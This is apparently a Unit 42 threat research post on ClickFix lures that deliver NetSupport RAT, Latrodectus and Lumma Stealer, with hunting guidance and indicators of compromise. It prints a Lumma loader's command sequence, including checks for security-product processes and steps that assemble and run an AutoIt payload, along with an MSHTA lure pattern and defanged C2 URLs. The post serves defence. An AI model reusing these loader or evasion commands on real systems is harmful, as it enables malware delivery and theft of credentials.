[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  English
* [English](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/)
* [Spanish (LATAM)](https://unit42.paloaltonetworks.com/es-la/preventing-clickfix-attack-vector/)
* [French](https://unit42.paloaltonetworks.com/fr/preventing-clickfix-attack-vector/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/preventing-clickfix-attack-vector/)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/ "Threat Research")
* [Malware](https://unit42.paloaltonetworks.com/category/malware/ "Malware")  
  [Malware](https://unit42.paloaltonetworks.com/category/malware/)

# Fix the Click: Preventing the ClickFix Attack Vector

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 14 min read  
Related Products  
[![Advanced DNS Security icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced DNS Security](https://unit42.paloaltonetworks.com/product-category/advanced-dns-security/ "Advanced DNS Security")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/product-category/advanced-url-filtering/ "Advanced URL Filtering")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/product-category/advanced-wildfire/ "Advanced WildFire")[![Cloud-Delivered Security Services icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Cloud-Delivered Security Services](https://unit42.paloaltonetworks.com/product-category/cloud-delivered-security-services/ "Cloud-Delivered Security Services")[![Cortex icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex](https://unit42.paloaltonetworks.com/product-category/cortex/ "Cortex")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/product-category/cortex-xdr/ "Cortex XDR")[![Cortex XSIAM icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XSIAM](https://unit42.paloaltonetworks.com/product-category/cortex-xsiam/ "Cortex XSIAM")[![Unit 42 Incident Response icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/unit42_RGB_logo_Icon_Color.png)Unit 42 Incident Response](https://unit42.paloaltonetworks.com/product-category/unit-42-incident-response/ "Unit 42 Incident Response")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:
  
  * [Rem Dudas](https://unit42.paloaltonetworks.com/author/rem-dudas/)
  * [Noa Dekel](https://unit42.paloaltonetworks.com/author/noa-dekel/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:July 10, 2025

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Malware](https://unit42.paloaltonetworks.com/category/malware/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [AutoIT](https://unit42.paloaltonetworks.com/tag/autoit/)
  * [ClickFix](https://unit42.paloaltonetworks.com/tag/clickfix/)
  * [Lumma Stealer](https://unit42.paloaltonetworks.com/tag/lumma-stealer/)
  * [Malvertising](https://unit42.paloaltonetworks.com/tag/malvertising/)
  * [Remote Access Trojan](https://unit42.paloaltonetworks.com/tag/remote-access-trojan/)
  * [Social engineering](https://unit42.paloaltonetworks.com/tag/social-engineering/)
  * [Typosquatting](https://unit42.paloaltonetworks.com/tag/typosquatting/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/?pdf=download&lg=en&_wpnonce=7052973960 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/?pdf=print&lg=en&_wpnonce=7052973960 "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Fix%20the%20Click:%20Preventing%20the%20ClickFix%20Attack%20Vector&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fpreventing-clickfix-attack-vector%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fpreventing-clickfix-attack-vector%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fpreventing-clickfix-attack-vector%2F&title=Fix%20the%20Click:%20Preventing%20the%20ClickFix%20Attack%20Vector "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fpreventing-clickfix-attack-vector%2F&text=Fix%20the%20Click:%20Preventing%20the%20ClickFix%20Attack%20Vector "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fpreventing-clickfix-attack-vector%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Fix%20the%20Click:%20Preventing%20the%20ClickFix%20Attack%20Vector%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fpreventing-clickfix-attack-vector%2F "Share in Mastodon")

## Executive Summary

In this article, we share hunting tips and mitigation strategies for ClickFix campaigns and provide an inside view of some of the most prominent ClickFix campaigns we have seen so far in 2025:

* Attackers distributing NetSupport remote access Trojan (RAT) are ramping up activities with a new loader
* Attackers distributing Latrodectus malware are luring victims with a new ClickFix campaign
* Prolific Lumma Stealer campaign targeting multiple industries with new techniques

ClickFix is an increasingly popular technique that threat actors use in social engineering lures. This technique tricks potential victims into executing malicious commands, under the pretense of conducting "quick fixes" for common computer issues.

These campaigns use the reputations of legitimate products and services to hide their activities in a way that makes them more difficult to spot. This does not imply that the author of the executable file is at fault or liable for the outcome caused by the malware.

ClickFix campaigns have impacted organizations in a wide variety of industries, including:

* High technology
* Financial services
* Manufacturing
* Wholesale and retail
* State and local government
* Professional and legal services
* Utilities and energy

Unit 42 has recently assisted in almost a dozen incident response cases in which a ClickFix lure was the initial access vector.

An effective ClickFix lure could enable threat actors to perform a complete takeover of the targeted organization. These lures can be fairly simple for threat actors to prepare, leaving organizations susceptible to credential gathering, mail theft and even ransomware incidents.

We identified two variations of this technique:

* Instructing a target to run malicious commands in the Run window by pressing Windows Key + R (Win+R)
* Instructing a potential victim to run malicious commands in a terminal window by pressing Windows Key + X (Win+X)

Palo Alto Networks customers are better protected from the threats described here through the following products and services:

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)
* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering) and [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)
* [Cortex XDR](https://docs-cortex.paloaltonetworks.com/p/XDR) and [XSIAM](https://docs-cortex.paloaltonetworks.com/p/XSIAM)

If you think you might have been compromised or have an urgent matter, contact the [Unit 42 Incident Response team](https://start.paloaltonetworks.com/contact-unit42.html).

| **Related Unit 42 Topics** | [**Social Engineering**](https://unit42.paloaltonetworks.com/tag/social-engineering/), **[Malware](https://unit42.paloaltonetworks.com/category/malware/)** ,[**Malvertising**](https://unit42.paloaltonetworks.com/tag/malvertising/) |
|----------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|

## Dissecting the ClickFix Technique

Before we examine the ClickFix technique, we must better understand what ClickFix is and how prevalent it has become in recent months.

ClickFix is a relatively new social engineering technique that threat actors increasingly use in attack campaigns. This technique misleads targeted users into applying "quick fixes" to common computer issues, such as performance issues, missing drivers or pop-up errors. In recent months, many of the lures using the ClickFix technique have been fake verification pages asking victims to complete an action before supposedly continuing to the viewer's intended destination.

Threat actors often deliver these lures through:

* Legitimate but compromised websites
* Malvertising
* YouTube tutorials
* Fake tech support forums

The ClickFix technique relies on [clipboard hijacking](https://www.malwarebytes.com/blog/news/2025/03/fake-captcha-websites-hijack-your-clipboard-to-install-information-stealers). Webpages using ClickFix inject malicious script or commands into a potential victim's clipboard and provide instructions to paste and run the malicious content. Because the ClickFix technique asks users to paste the content, this is sometimes referred to as "pastejacking."

Attackers use the ClickFix technique as an initial infection vector and the payloads that follow it vary --- some lures drop infostealers, others deploy RATs or disable security tools. But all rely on convincing the victim to do the attacker's job for them: running the code manually.

This delivery method bypasses many standard detection and prevention controls. There is no exploit, phishing attachment or malicious link. Instead, potential victims unknowingly run the command themselves, through a trusted system shell.

This method makes infections from ClickFix more complicated to detect than drive-by downloads or traditional malware droppers. However, researchers can still look for artifacts to detect these infections.

### The Rise of a Global Phenomenon

We have been closely monitoring ClickFix lures in recent months and have found scores of variants that deliver multiple malware families. Figure 1 shows the distribution of cases per week.
![Bar chart showing the count of events by week, from week starting 2024-12-30 to 2025-05-12. Event counts range from a low of 1 to a high of 126. Major peaks are noted at week starting 2025-01-27 with 121 events and 2025-03-24 with 126 events.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/chart-1.png) Figure 1. Weekly infection instances since the beginning of 2025.

Our researchers also noted the impact of ClickFix across a wide variety of business sectors, as shown in Figure 2.
![Bar graph showing the count of entities by industry. Industries represented from highest to lowest counts are: High Technology, Financial Services, Manufacturing, Wholesale and Retail, State and Local Government, Professional and Legal Services, Utilities and Energy, Pharma and Life Sciences, Hospitality, Telecommunications, Healthcare, Federal Government, Education. Palo Alto Networks and Unit 42 logo lockup.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-762309-145728-2.png) Figure 2. Distribution of industries affected by ClickFix lures.

## Case Studies

Three of the most prominent campaigns we have observed so far in 2025 show how threat actors have integrated ClickFix into the attack flow of various malware families.

### NetSupport RAT Switches Up Its Loading

During ClickFix-related activity hunting, we identified one particularly prolific campaign that was active in May 2025. In this campaign, attackers using NetSupport RAT impacted various industries, including:

* Healthcare
* Legal services
* Telecommunications
* Retail
* Mining

This ClickFix campaign distributing NetSupport RATs leverages distribution domains that masquerade as legitimate and popular services:

* DocuSign: A digital platform for signing, sending and managing documents electronically.
* Okta: A platform that helps companies manage and secure user access to applications and systems. It provides single sign-on (SSO), multifactor authentication and identity management services.

Threat actors often abuse, take advantage of or subvert legitimate products for malicious purposes. This does not imply that the legitimate product is flawed or malicious.

Figures 3 and 4 show the fake DocuSign and Okta landing pages:

![Spoofed landing page for PandaDoc, discussing the document signing alternative, highlighting ease and cost-effectiveness, with various industry badges and logos of trusted brands.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-765935-145728-3.png) Figure 3. Fake landing page for DocuSign at docusign.sa\[.\]com. ![A screenshot of a spoofed security verification page featuring a checkbox labeled "Verify you are human" with a Cloudflare logo below it. The text explains that the site needs to review the security of your connection before proceeding.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-769189-145728-4.png) Figure 4. Fake landing page for Okta at oktacheck.it\[.\]com. We suspect this ClickFix campaign distributes NetSupport RAT over [ClearFake](https://reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/) infrastructure. Our suspicion is based on the similarities between the ClickFix lure and ClearFake infrastructure. Both contain the same Russian comments and use identical JavaScript clipboard injection functionality.

ClearFake is a malicious JavaScript framework deployed on compromised websites as part of drive-by download campaigns used by other malware strains. Figure 5 shows ClearFake injecting an encoded PowerShell command using the JavaScript function unsecuredCopyToClipboard. The figure also shows comments in Russian within the code, giving us clues to the ClearFake developer's origins.
![A screenshot split into two sections showing verification steps on the left and computer code on the right. On the left, an orange interface instructs the user to complete verification steps like pressing and holding windows key and R, and verifying by pressing Enter. This is the first step. On the right, a coding interface with lines of code in red and black colors, notes in Russian, indicating modifications to a PowerShell command. The second step is the obfuscated PowerShell command injected to a user's keyboard.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-772900-145728-5.png) Figure 5. Landing page and script injection in a fake DocuSign page.

The fake verification window displays instructions to open the Run dialog and then paste the clipboard contents into it, with the interface presenting these instructions as a test to prove that the user is human. The victim might be unaware of the malicious PowerShell command that the website subsequently injects (as mentioned above, this is an example of [pastejacking](https://github.com/dxa4481/Pastejacking)).

Once executed, the command downloads another PowerShell script that downloads and executes the next stage in the attack. The infection chain is mapped out in Figure 6.
![Flowchart illustrating a cyber attack involving fake Okta website prompts, execution of Cmd.exe, and PowerShell to download and run malicious software including NetSupport RAT and various executable files, leading to data injection and exfiltration.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-776936-145728-6.png) Figure 6. The NetSupport RAT infection chain.

The next stage is contained within a ZIP archive, which includes all the legitimate dependencies required to execute jp2launcher.exe. This file is a legitimate Java Runtime Environment (JRE) component used to launch Java applications, as Figure 7 shows.
![Screenshot of a computer screen displaying a list of files primarily related to Microsoft Windows components and applications. Each file entry shows the file name, modification date, type, and size. Three rows are highlighted in a red box.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-780885-145728-7.png) Figure 7. Contents of the ZIP archive downloaded by cmd.exe.

First, cmd.exe downloads the ZIP archive, extracts its content and saves that content in the %APPDATA%/Local/Temp/ directory. Then, cmd.exe launches jp2launcher.exe, which sideloads a malicious loader named msvcp140.dll. The [Appendix](#post-145728-_zctlzocvrsya) of this article provides a full technical analysis of the new DLL-based NetSupport RAT loader\*\*.\*\*

Finally, the DLL downloads and executes a ZIP archive that contains NetSupport RAT (client32.exe) and associated files. NetSupport RAT is legitimate software, but out-of-date or stolen copies are often misused by [different threat actors](https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html), usually configured as a RAT for infiltration and endpoint infection.

### Latrodectus Spins New ClickFix Lures

During March-April 2025, we noticed an increasing amount of traffic to Latrodectus-controlled domains. We also saw a shift in infection strategy, as attackers distributing Latrodectus started to use the ClickFix technique in their initial access vectors.

This Latrodectus attack chain begins when a person visits a legitimate, but compromised website. Then, ClearFake infrastructure redirects the site visitor to a fake verification page. This page presents a prompt instructing the viewer to run a command via the Run dialog, while the malicious JavaScript backend injects a PowerShell command into the endpoint's clipboard.

Figure 8 below shows the lure and the subsequent redirection chain from the compromised site.
![Screenshot of a computer screen displaying a captcha verification page instructing the user to complete steps using keyboard shortcuts. The screen also shows web development tools open in the browser with various script names visible.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-784062-145728-8.png) Figure 8. Latrodectus ClickFix lure.

When victims paste and execute the injected command, they do not see the command itself. What they do see is the final comment at the end of the script (Cloud Identificator: 2031), which looks like part of a normal authentication process. However, upon execution, the script uses curl.exe to download a JavaScript file from a command-and-control (C2) server. It then executes the file via Cscript, as Figure 9 shows.
![Code snippet with syntax highlighting in dark mode, with some redactions for privacy.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-790200-145728-9.png) Figure 9. A malicious command injected from a ClickFix lure onto the target's clipboard.

Since its emergence in mid-2024, attackers have frequently delivered Latrodectus through a chain that includes a malicious JavaScript file downloading a Microsoft Software Installer (MSI) file that drops Latrodectus. In this case, the executed JavaScript file (la.txt) retrieves an MSI file from a remote server and runs it using msiexec.exe.

Unlike earlier campaigns where the JavaScript downloader was typically bloated and obfuscated with nonsensical comments, this variant employs large junk JSON variables that have seemingly legitimate names, such as var\_Apple\_Palantir38 and func\_Slack\_encryption84. Figure 10 shows a comparison of the obfuscation techniques used in past and recent Latrodectus campaigns.
![Two side-by-side images displaying coding scripts: the left shows a code snippet with variables and functions, while the right features a code block with a loop and conditional statements.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-793783-145728-10.png) Figure 10. Comparison between recent (left) and older (right) obfuscation techniques used in Latrodectus droppers.

The MSI payload drops several files onto the victim's disk. These include [Latrodectus](https://www.virustotal.com/gui/file/aef5c150cfe8154ed290b293e30d552cfb9b40b3552369345c7c2f135b63aac4/relations), which is dropped as a malicious DLL file (libcef.dll), and a legitimate binary that sideloads the DLL. This is demonstrated in Figure 11.
![Diagram of the Latrodectus infection chain, starting with a compromised legitimate website and moving through the ClickFix tactic, leading to the downloading and execution of an EXE file and malicious shell code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/image5.png) Figure 11. The Latrodectus infection chain.

When the legitimate file side-loads the malicious DLL for Latrodectus, it injects shellcode into itself.

In a May 2025 [Timely Threat Intelligence post,](https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-05-16-IOCs-on-recent-ClickFix-activity.txt) we analyzed a similar Latrodectus campaign, in which Lumma Stealer was the final payload of the full attack chain.

### Lumma Stealer Typosquatting Campaign

While attackers distributing Lumma Stealer started using the ClickFix infection technique [in late 2024](https://www.esentire.com/security-advisories/lumma-stealer-clickfix-distribution), we have seen a surge in ClickFix infection attempts for Lumma Stealer as recently as April 2025. In recent campaigns, attackers distributing Lumma Stealer have impacted a broad range of sectors, including:

* Automotive
* Energy
* IT
* Software

Our investigation into one of these ClickFix campaigns revealed that targets are prompted to copy a unique MSHTA command with the following structure: mshta xxxx\[.\]co/xxxxxx =+\\xxx.

The attackers give each target a specific identifier string, which they can use to receive the payload once. However, the URIs our researchers checked were no longer delivering the payloads post-infection.

Upon executing the ClickFix script, the script redirects the viewer to a [typosquatted](https://unit42.paloaltonetworks.com/cybersquatting/) version of the IP Logger domains iplogger\[.\]org and iplogger\[.\]com. IP Logger is a URL shortening and IP tracking service that creates links to log information about visitors, such as:

* IP addresses
* Geolocation
* Device details
* Browsing behavior

The typosquatted domain controlled by the attackers is iplogger\[.\]co, and the page for this domain is disguised as a known and legitimate service.

In all instances of the campaign, we observed that the MSHTA command downloaded an encoded PowerShell script, which initiated a Lumma Stealer infection. Figure 12 demonstrates the entire infection chain.
![Lumma Stealer infection depicting the process of a malware attack involving entities like ClickFix, Encoded PowerShell, Lumma Stealer, and various functions like contacting Command and Control (C2) server, building executables, and detecting security products. The chart shows connections and actions such as resource dropping and execution commands throughout the attack lifecycle.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-807023-145728-13.png) Figure 12. The Lumma Stealer infection chain.

Each attacker-controlled link hosts a heavily obfuscated and Base64-encoded PowerShell command that ultimately leads to the drop and execution of a malicious Lumma Stealer stager named PartyContinued.exe. This executable is hosted at: hxxps\[:\]//pub-\<dynamically generated number string\>.r2\[.\]dev and is named to seem like a legitimate developer URL.

When PartyContinued.exe launches, it sets up a new Lumma loading method that uses a scripting language called [AutoIt](https://www.autoitscript.com/wiki/AutoIt_and_Malware). This version of Lumma Stealer is similar to earlier versions but includes a new Microsoft cabinet archive (CAB) file named Boat.pst. This CAB file is bundled inside PartyContinued.exe and holds the rest of the content that is used to create an AutoIt3 script engine and an AutoIt script it executes for Lumma Stealer.

Table 1 summarizes the commands executed by the loader and their purpose:

|--------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------|
| **Command**                                                                                                                                            | **Description**                                                                                                                                     | **Purpose**                                                     |
| tasklist | findstr /I "opssvc wrsa"                                                                                                                   | Performs a case-insensitive search for opssvc or wrsa in the name of a running process.                                                             | Endpoint security software detection                            |
| tasklist | findstr "bdservicehost SophosHealth AvastUI AVGUI nsWscSvc ekrn"                                                                           | Searches for various strings in the running processes.                                                                                              | Endpoint security software detection                            |
| cmd /c md 386354                                                                                                                                       | Creates a directory for saving the malware to disk.                                                                                                 | Set location for payload extraction                             |
| extrac32 /Y /E Boat.pst                                                                                                                                | Extracts files from the .cab file named Boat.pst, overwriting existing files (/Y) and extracting all files (/E).                                    | Payload extraction                                              |
| set /p ="MZ" \> 386354\\Slovenia\[.\]com \<nul                                                                                                         | Creates a file named Slovenia\[.\]com under the 386354 directory containing two bytes for the characters MZ.                                        | Construct the AutoIt3 executor                                  |
| findstr /V "Tr" Bell \>\> 386354\\Slovenia\[.\]com                                                                                                     | Appends all lines in the extracted file named Bell that do not contain the string Tr (case-sensitive) to the file Slovenia\[.\]com.                 | Construct the AutoIt3 executor                                  |
| cmd /c copy /b 386354\\Slovenia\[.\]com + Sewing + Monetary + Covered + Health + Loss + Intel + Escape + Tramadol + Apparatus 386354\\Slovenia\[.\]com | Appends other extracted files to finish creating a binary file using copy /b. The result is a copy of AutoIt3.exe, which is named Slovenia\[.\]com. | Construct the AutoIt3 executor                                  |
| cmd /c copy /b ..\\Presently.pst + ..\\Instantly.pst + ..\\Roy.pst + ..\\Tolerance.pst + ..\\Mailto.pst + ..\\Marco.pst + ..\\Mint.pst G               | Creates a binary named G that Slovenia\[.\]com will run as an AutoIt v3 compiled script (.a3x).                                                     | Construct the Lumma Stealer payload (binary run as an .a3x file |
| start Slovenia\[.\]com G                                                                                                                               | Command for the AutoIt3 executor to run the binary for Lumma Stealer as an .a3x file.                                                               | Load/run Lumma Stealer                                          |
| choice /d y /t 5                                                                                                                                       | Command to select yes (y) for the default option (/d) for commands in the .bat file after waiting five seconds (/t 5).                              | Allows Lumma Stealer to run without any user interaction        |

Table 1. Commands executed by the loader for Lumma Stealer.

As shown in the table, Slovenia\[.\]com is a copy of the AutoIt3 script engine AutoIt3.exe that executes a binary run as an AutoIt script (.a3x) named G, which is responsible for the next stages of the attack. This version of Latrodectus harvests sensitive information, including Chromium-based browser passwords, and attempts to exfiltrate them to a C2 server at sumeriavgv\[.\]digital.

## Hunting for ClickFix Infections

ClickFix attacks often leave easily detectable traces, especially when the people who view these lures are unfamiliar with opening administrative interfaces, making them more likely to paste a malicious command string into a Run window.

### Reviewing RunMRU Artifacts

Windows maintains a registry key that stores the most recently executed commands from the Run window (Win + R), called RunMRU:

HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU

This registry key saves any commands that are executed from the Run window, enabling analysts to parse these entries to look for signs of suspicious usage.

Some key indicators for suspicious RunMRU contents could be:

* Obfuscated content
* Keywords related to the download and execution of payloads from unknown or suspicious domains
* Keywords indicating calls to administrative interfaces

These entries indicate that someone might have manually triggered such commands, which is consistent with a ClickFix infection flow.

### Detecting Win + X ClickFix

Some attackers aim to avoid exposing their activity in the RunMRU registry key. They instead present instructions to launch a terminal for PowerShell (Windows 11) or Command Prompt (Windows 10) via Win+X for the Quick Access Menu. A [March 2025 report](https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2) reveals that attackers distributing Havoc used this Win+X variation of ClickFix.

Threat hunters can look for signs of this Win+X ClickFix technique using EDR telemetry or Windows Event Logs --- specifically:

* **Security event ID 4688 (Process Creation):** Look for powershell.exe spawned by explorer.exe, in correlation with Event ID 4663 (Object Access) of files under the %LocalAppData%\\Microsoft\\Windows\\WinX\\ folder.
* **Shell usage patterns:** Elevated PowerShell sessions invoked shortly after interactive logins, followed by network connections or suspicious child processes (e.g., certutil.exe, mshta.exe and rundll32.exe), are often red flags.
* **Clipboard monitoring:** Since ClickFix lures rely on potential victims pasting malicious content from the clipboard, we can correlate paste activity with PowerShell execution shortly after the user types Win+X.

## Conclusion

The ClickFix technique is a growing threat, with dynamically shifting approaches in its implementation. Threat actors leverage ClickFix in attacks against organizations, exploiting human error for propagation and persistence.

This article explored three prominent ClickFix campaigns --- NetSupport RAT, Latrodectus and Lumma Stealer --- all of which are constantly adapting and incorporating new techniques.

Practical methodologies for hunting and detecting ClickFix lures include investigating EDR telemetry or Windows Event Logs for suspicious events, activities and patterns.

Proactively addressing this evolving threat is vital to the ongoing security of organizations. To this end, efforts should be made to increase awareness by educating personnel to be wary of ClickFix lures. This should be done while also setting up defense and monitoring measures based on our hunting suggestions.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)
* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering) and [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security) detect ClickFix attacks, such as those discussed in this blog, with our offline security web crawlers by detecting malicious commands injected into the clipboard buffer by malicious JavaScript
* [Cortex XDR](https://docs-cortex.paloaltonetworks.com/p/XDR) and [XSIAM](https://docs-cortex.paloaltonetworks.com/p/XSIAM) prevent all campaigns and malware discussed in this article through the Behavioral Threat Protection module

If you think you may have been compromised or have an urgent matter, get in touch with the[Unit 42 Incident Response team](https://start.paloaltonetworks.com/contact-unit42.html) or call:

* North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
* UK: +44.20.3743.3660
* Europe and Middle East: +31.20.299.3130
* Asia: +65.6983.8730
* Japan: +81.50.1790.0200
* Australia: +61.2.4062.7950
* India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the [Cyber Threat Alliance](https://www.cyberthreatalliance.org).

## Indicators of Compromise

### SHA256 Hashes From Lumma Stealer Example

* Filename PartyContinued.exe: 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef
* Filename Boat.pst (a CAB file): 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7

### Domains From Lumma Stealer Example

* iplogger\[.\]co
* stuffgull\[.\]top
* sumeriavgv\[.\]digital
* pub-164d8d82c41c4e1b871bc21802a18154.r2\[.\]dev
* pub-626890a630d8418ea6c2ef0fa17f02ef.r2\[.\]dev
* pub-164d8d82c41c4e1b871bc21802a18154.r2\[.\]dev
* pub-a5a2932dc7f143499b865f8580102688.r2\[.\]dev
* pub-7efc089d5da740a994d1472af48fc689.r2\[.\]dev
* agroeconb\[.\]live
* animatcxju\[.\]live

### SHA256 Hashes From Latrodectus Example

* Filename libecf.dll: 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1
* PowerShell Downloader: 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293
* JavaScript Downloader: 57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a
* JavaScript Downloader: 33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559

### C2 URLs From Latrodectus Example

* hxxps\[:\]//webbs\[.\]live/on/
* hxxps\[:\]//diab\[.\]live/up/
* hxxps\[:\]//mhbr\[.\]live/do/
* hxxps\[:\]//decr\[.\]live/j/
* hxxps\[:\]//lexip\[.\]live/n/
* hxxps\[:\]//rimz\[.\]live/u/
* hxxps\[:\]//byjs\[.\]live/v/
* hxxps\[:\]//btco\[.\]live/r/
* hxxps\[:\]//izan\[.\]live/r/
* hxxps\[:\]//k.veuwb\[.\]live/234
* hxxps\[:\]//r.netluc\[.\]live
* heyues\[.\]live
* hxxps\[:\]//k.mailam\[.\]live/234234

### SHA256 Hashes From NetSupport RAT Example

* Filename data\_3.bin (XOR encrypted stager): 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D
* Filename data\_4.bin (XOR encrypted shellcode): 9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288
* Filename msvcp140.dll (loader): CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527
* NetSupport Loader Mutex:  
  nx0kFgSPY8SDVhOMjmNgW
* libsqlite3-0.dll: 506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a
* File location C:\\ProgramData\\SecurityCheck\_v1\\client32.exe: 3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7

### Domains for the Loader From the NetSupport RAT Example

* oktacheck.it\[.\]com
* doccsign.it\[.\]com
* docusign.sa\[.\]com
* dosign.it\[.\]com
